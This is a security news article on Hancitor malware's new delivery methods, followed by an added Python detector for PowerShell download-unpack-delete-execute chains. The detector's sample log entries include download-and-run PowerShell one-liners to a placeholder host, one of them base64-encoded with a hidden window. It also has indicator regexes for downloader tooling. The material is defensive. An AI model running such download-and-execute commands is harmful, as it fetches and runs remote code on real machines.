The criminals behind the Hancitor malware have updated its code, adding new delivery methods designed to evade detection by security software.
Hancitor Gets Even More Dangerous Than Before
The criminal developers of Hancitor have updated the malware's code, adding new delivery methods and features that make it harder for security software to spot. Hancitor is a popular downloader used by attackers worldwide in phishing and spam campaigns.
The downloader still spreads by the old mechanism: malicious spam email attachments. The discovered samples delivered through Hancitor were the information-stealing malware families Pony and Vawtrak. However, security researchers report that the payload delivery system used by Hancitor has changed.
- The first new method uses the native Windows API CallWindowProc to execute malicious shellcode.
- A second mechanism uses the callback parameter of EnumResourceTypesA to execute shellcode.
- The third delivery technique relies on obfuscated, malicious PowerShell commands.
The third delivery option is actually fairly complex. The malware assembles the command from code fragments taken from the section_header of an embedded image file, and the attackers use a tiny font size to hide the PowerShell text inside the document. The command then fetches the payload from an attacker-controlled site as a zipped archive and decompresses it on the local machine, which helps it evade the standard detection methods used by security software. Once the executable has been extracted, the code deletes the archive to remove traces. The final step is to run the downloaded malware: the Pony password stealer and the Vawtrak Trojan.
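The download, unpack, delete and execute sequence described above is a useful pattern to hunt for in PowerShell script block logs. The following detector is an added example written for this article, not code from the original report or from the Hancitor samples it describes; it assumes script block contents are available (for instance from PowerShell script block logging), and the sample entries and indicator patterns are constructed for illustration rather than taken from real Hancitor artefacts. It also unwraps `-EncodedCommand` payloads (assumed to be base64 of UTF-16LE text, which is how PowerShell encodes them) so the inner command is scored too.

```python
import base64
import re
from dataclasses import dataclass
from typing import List

# Indicator patterns (illustrative, not a complete signature set).
INDICATORS = {
    "download": re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I),
    "extract":  re.compile(r"Expand-Archive|ZipFile\]::Extract|\.zip\b", re.I),
    "cleanup":  re.compile(r"Remove-Item|\bdel\b|\brm\b|\bri\b", re.I),
    "execute":  re.compile(r"Start-Process|Invoke-Expression|\biex\b|\.exe\b", re.I),
    "stealth":  re.compile(r"-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile|-e(?:nc|ncodedcommand)\b", re.I),
}

# Matches the -EncodedCommand switch and its common abbreviations (assumption: base64 of UTF-16LE).
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(block: str) -> str:
    """Return the block with any -EncodedCommand payload decoded and appended."""
    m = ENC_RE.search(block)
    if not m:
        return block
    try:
        inner = base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return block
    return block + " " + inner


@dataclass
class Finding:
    block: str
    indicators: List[str]
    verdict: str


def analyze(block: str) -> Finding:
    """Score one script block against the indicator set and assign a verdict."""
    text = decode_encoded_command(block)
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    h = set(hits)
    if "download" in h and "cleanup" in h and ({"extract", "execute"} & h):
        # download -> unpack -> delete archive -> run: the chain the article describes
        verdict = "download-unpack-cleanup chain"
    elif "download" in h and "stealth" in h:
        verdict = "hidden/encoded downloader"
    else:
        verdict = "benign"
    return Finding(block, hits, verdict)


def scan(blocks: List[str]) -> List[Finding]:
    """Return only the blocks that were not classified as benign."""
    return [f for f in (analyze(b) for b in blocks) if f.verdict != "benign"]


# Constructed sample script-block log entries (not real Hancitor artefacts).
_INNER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
_ENCODED = base64.b64encode(_INNER.encode("utf-16le")).decode()

SAMPLE_SCRIPT_BLOCKS = [
    # benign administrative use
    "Get-ChildItem C:\\Logs -Filter *.log | Sort-Object LastWriteTime",
    # download -> unzip -> delete archive -> run
    "$w=New-Object Net.WebClient;$w.DownloadFile('http://example.invalid/p.zip',\"$env:TEMP\\p.zip\");"
    'Expand-Archive "$env:TEMP\\p.zip" $env:TEMP;Remove-Item "$env:TEMP\\p.zip";Start-Process "$env:TEMP\\p.exe"',
    # downloads an archive but neither self-deletes nor executes anything
    "Invoke-WebRequest https://example.invalid/tools.zip -OutFile C:\\Tools\\tools.zip",
    # hidden, profile-less, encoded launcher whose decoded body is a downloader
    f"powershell -w hidden -nop -enc {_ENCODED}",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_SCRIPT_BLOCKS):
        print(finding.verdict, sorted(finding.indicators), finding.block[:60])
```

The verdict for a bare archive download is deliberately "benign": the distinguishing feature of the chain is the cleanup and execution that follow, not the download itself, so a rule keyed on downloads alone would drown analysts in software-update noise.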
The bundled version of Pony lets the criminals harvest data stored in browsers, such as saved passwords and other form information, as well as Microsoft Outlook account data.